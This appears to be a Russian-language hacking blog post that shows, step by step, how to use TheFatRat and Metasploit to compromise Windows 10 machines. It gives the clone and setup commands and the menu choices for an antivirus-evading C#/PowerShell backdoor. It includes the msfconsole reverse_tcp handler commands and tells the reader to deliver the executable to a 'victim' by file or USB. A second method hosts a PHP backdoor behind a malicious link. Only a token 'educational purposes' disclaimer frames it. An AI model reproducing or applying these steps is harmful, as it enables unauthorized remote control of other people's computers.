Взлом Windows 10 с помощью FATRAT
overlamer1
Metasploit - идеальный инструмент для взлома и эксплуатации телефонов Android и устройств с Windows 10. Также есть множество оконных модулей для взлома.
Но есть много других инструментов, таких как fatrat, которые значительно упрощают взлом Windows, iOS, Mac, Linux и Android. Итак, в этом посте вы узнаете о взломе Windows 10 с помощью fatrat.
Дисклеймер. Автор статьи не несёт ответственности за действия, описываемые в данной статье. Всё что показано, сделано в сугубо образовательных целях. Делайте всё на свой страх и риск.
Что такое FATRAT?
FATRAT - хакерский фреймворк, который используется для создания rat-приложений и rat-apk-файлов с обратными оболочками, которые можно использовать для взлома устройств. Мы будем использовать FATRAT для взлома Windows 10.
Даже последнюю Windows 11 можно взломать с помощью fatrat. По сути, это тщательно подобранный набор инструментов удаленного администрирования, наполненный эксплойтами для всех платформ, таких как Windows, Linux, Mac и Android.
Почему FATRAT?
FATRAT - это проект с открытым исходным кодом, предназначенный для простого процесса взлома, необходимого для Windows и других платформ. Он содержит множество эксплойтов и хаков для Windows, созданных сообществом. Самое приятное состоит в том, что его можно использовать для пентеста абсолютно бесплатно.
Взлом Windows 10 с помощью FATRAT и KALI LINUX
Шаг 1. Откройте терминал Kali Linux и клонируйте FATRAT из Github
Git клонируйте следующий инструмент для взлома Windows FATRAT из терминала Kali Linux и выполните следующие команды:
Для типа клонирования
git clone https://github.com/Screetsec/TheFatRat.git
Затем введите cd TheFatRat
Шаг 3: Установите и дайте разрешения для FATRAT Tool
Предоставьте папке и скрипту права root для компиляции и выполнения. Используйте следующую команду, показанную ниже.
chmod + x setup.sh
Шаг 4: Установите FATRAT и его требования для взлома Windows 10
Теперь используйте следующую команду для установки инструмента FATRAT в Kali Linux.
Введите следующую команду, чтобы начать установку.
./setup.sh
Учтите, что установка займет некоторое время. Наберитесь терпения и позвольте этому закончить.
После завершения установки вы увидите следующий экран.
Введите y, если да. При этом вы можете запускать fatrat с любого терминала на kali.
Теперь пробуем
Создадим бэкдор, используя pwnwinds
type 6
Теперь создадим фуд-бэкдор с помощью C # + Powershell и взломаем windows 10.
type 2
Теперь, когда вы выбрали бэкдор, вам нужно указать необходимые параметры для взлома windows.
Введите IP-адрес прослушивателя LHOST.
Тип 192.168.1.12
Введите порт 4444 или любой номер порта.
Введите имя файла бэкдора testfile
Введите 3 для использования windows / meterpreter / reverse_tcp.
Нажмите Enter, чтобы создать бэкдор для взлома Windows.
После создания бэкдора, он будет сохранен в /home/user/Downloads/TheFatRat/output/testfile.exe
Чтобы получить доступ к нему, перейдите в указанное выше место и скопируйте файл на компьютер жертвы. Или отправьте файл жертве. Вы также можете запустить файл с помощью USB-накопителя.
Шаг 5: Настройка Metasploit
Откройте новый терминал kali Linux и используйте следующую команду для запуска Metasploit framework.
# msfconsole
Теперь в консоли Metasploit введите следующие команды:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.182.136
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Здесь
**LHOST= YOUR IP address
**LPORT= 4444
Шаг 6. Действуем
Как только жертва нажимает на файл, появляется всплывающее окно, а затем открывается сеанс meterpreter.
Как показано ниже, сеанс meterpreter запущен в msfconsole.
Вышеуказанная жертва использует систему Windows с последними обновлениями. Тем не менее, её легко взломать. Обратите внимание, что многие антивирусы будут видеть файл как вирус.
Введите команду help, чтобы увидеть все возможные команды, которые вы можете использовать с системой Windows.
Взлом с помощью ссылки
Шаг 1. Запуск fatrat
Здесь мы создадим бэкдор с использованием PHP.
Type 1
Создать бэкдор с msfvenom
Затем введите 5
FATRAT.PHP BACKDOOR
Шаг 2: Введите необходимые параметры
Тип LHOST 192.168.182.136
Затем введите порт 4444
Введите имя файла textfile
Как показано на изображении выше и бэкдор будет создан.
После создания полезной нагрузки переместите ее в расположение сервера Apache. Поскольку эта полезная нагрузка будет открыта с использованием IP-адреса.
Шаг 3. Переместите файл в службу хоста
Теперь скопируйте testfile.php в /var/www/html
Затем откройте новый терминал и введите
sudo service apache2 start
Шаг 4: Настройка Metasploit
Откройте новый терминал kali Linux и введите следующую команду, чтобы запустить Metasploit.
# msfconsole
Теперь в консоли Metasploit введите следующее
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.182.136
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Здесь
**LHOST= YOUR IP address
**LPORT= 4444
Шаг 5: Эксплуатация
Как целевая жертва открывает вредоносный URL.
URL-адрес: 192.168.182.136/testfile.php
Сценарий PHP запустится в фоновом режиме, и начнется сеанс meterpreter, как показано ниже.
В тот момент, когда жертва откроет ссылку или приложение на своем устройстве с Windows, вы увидите оболочку meterpreter на терминале Kali Linux.
Готово. Цель нашей задачи успешно выполнена.
На этом всё. Мы бы хотели сказать, что перед тем как открывать ссылки, необходимо быть осторожными. Желательно открывать только то, что вы уже знаете. Главный антивирус сейчас читает эту статью =) Поэтому необходимо всегда себя контролировать. А если будет самоконтроль, то будет и чистый ПК.
• Канал про криптовалюту: CryptOVER
• Наш мерч: Магазин
•Телеграм канал: TESTLAND
•Личный телеграм канал: overbafer1
•Группа ВК: overpublic1
•Youtube: overbafer1
•Второй Youtube: IGOR OVER
•🤖 https://overbafer1.ru/ - эксклюзивный бот для разведки и поиска информации в сети.